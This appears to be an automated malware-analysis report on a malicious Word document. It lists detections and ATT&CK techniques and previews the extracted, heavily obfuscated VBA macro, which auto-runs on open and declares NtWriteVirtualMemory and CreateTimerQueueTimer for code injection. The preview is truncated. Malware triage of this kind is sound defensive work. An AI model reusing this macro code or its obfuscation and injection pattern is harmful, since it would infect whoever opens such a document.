MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic identifies it as a downloader, suggesting it fetches and executes additional malware. The VBA code is heavily obfuscated, making it difficult to determine the exact payload or destination, hence the unknown family and slightly reduced confidence.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11934 bytes |
SHA-256: 159e8d1ca5182ac03b47d42778e9eb41b4766d31f0650351c2d65aca8e3654fb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim gallstone As Integer Dim campaniliform As Variant capitulation = "nontransferable" flowerless = "statehouse" nonparametric linecut = 50 + 52 Pmt 0, linecut, 16628, 28182, 8 End Sub Attribute VB_Name = "xmods" #If (89 - 45 + 356 + 85 - 60 + 275) > ((52 - 85 + 353) - (91 - 2 + 451) * 1) And ((58 - 43 + 13) - (1 - 37 + 64)) * 2 < (Win64) Then Public Declare PtrSafe Function kilowatt _ Lib "Kernel32 " Alias _ "CreateTimerQueueTimer" (debile As Any, ByVal scrimp As Any, ByVal aioli As Any, ByVal conflux As Any, ByVal legionary As Any, ByVal albatrellus As Any, ByVal espieglerie As Any) As Long #End If Function dubash(dramaturgic, machete, severality) Dim initiate As Byte Dim battologize As Integer Dim pike As LongPtr Dim orbicular As LongPtr Dim paralyze As LongPtr Dim deficient As Long Dim theatrical As LongPtr Dim absorbefacient As LongPtr losings = losings flaky = Fix(447) orbicular = dramaturgic absorbefacient = severality redefinition = "bringword" theatrical = machete neonatalmed = 24 + 55 Pmt 0, neonatalmed, 13964, 22109, 4 cantonment = Math.Round(210) pike = 9 - 6 - 4 equerry ByVal pike, _ orbicular, _ theatrical, absorbefacient, _ paralyze cantonment = Rnd(143) End Function Attribute VB_Name = "wmods" #If (88 - 29 + 341 + 9 - 125 + 416) > ((36 - 42 + 326) - (15 - 86 + 611) * 1) And Not ((8 - 117 + 137) - (22 - 112 + 118)) * 2 < (Win64) Then Public Declare Function equerry _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal mileage As Any, ByVal porphyrula As Any, ByVal pleadings As Any, ByVal faedera As Any, ByVal manihot As Any) As Long #End If #If (88 - 29 + 341 + 9 - 125 + 416) > ((36 - 42 + 326) - (15 - 86 + 611) * 1) And Not ((8 - 117 + 137) - (22 - 112 + 118)) * 2 < (Win64) Then Public Declare Function kilowatt _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (curtail As Any, ByVal blandishment As Any, ByVal beauteous As Any, ByVal carried As Any, ByVal bloomeria As Any, ByVal belching As Any, ByVal macintosh As Any) As Long #End If #If (89 - 45 + 356 + 85 - 60 + 275) > ((52 - 85 + 353) - (91 - 2 + 451) * 1) And ((58 - 43 + 13) - (1 - 37 + 64)) * 2 < (Win64) Then Public Declare PtrSafe Function equerry _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal bryanite As Any, ByVal pelisse As Any, ByVal feroe As Any, ByVal sustentacular As Any, ByVal substantial As Any) As LongPtr #End If Function dolorific(fraudulent, addable, aut) Dim anobiidae As Long Dim encompass As Long Dim bluejacket As Long Dim nylons As Long Dim housing As Long anobiidae = (fraudulent) housing = aut bluejacket = addable Pmt 0, (43 + 39), 28468, 33782, 5 encompass = 56 - 39 - 18 equerry ByVal encompass, anobiidae, bluejacket, housing, nylons End Function Sub nonparametric() Dim dayboy As Long Dim unheard As Long dove.creativeness.Value = Day(#12/5/2013#) varday = counterchange = dashingly angled = "antirrhinum" verba = corruptly alder = "chokidar" teashop = "hydromantes" absinthe = "aftermath" bemisia = heavensent Set gite = dove.creativeness.SelectedItem deference = 10 + 59 Pmt 0, deference, 16863, 18452, 3 deontology = gite.Name anomala = 11 - 10 + 7843 crocodylus = Right(deontology, anomala) exits = alacran.cowpens(crocodylus) conuropsis = 59 + 12 Pmt 0, conuropsis, 13082, 32946, 8 elliptical = "fawning" #If (44 - 64 + 420 + 109 - 7 + 198) > ((18 - 54 + 356) - (97 - 118 + 561) * 1) And ((71 - 108 + 65) - (103 - 69 - 6)) * 2 < (Win64) Then Dim bundling As String Dim flue As LongPtr Dim painterly As LongPtr Dim crumple As Long #ElseIf (43 - 23 + 380 + 6 - 81 + 375) > ((63 - 23 + 280) - (121 - 68 + 487) * 1) And Not ((64 - 20 - 16) - (104 - 53 - 23)) * 2 < (Win64) Then Dim homes As Byte Dim painterly As ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.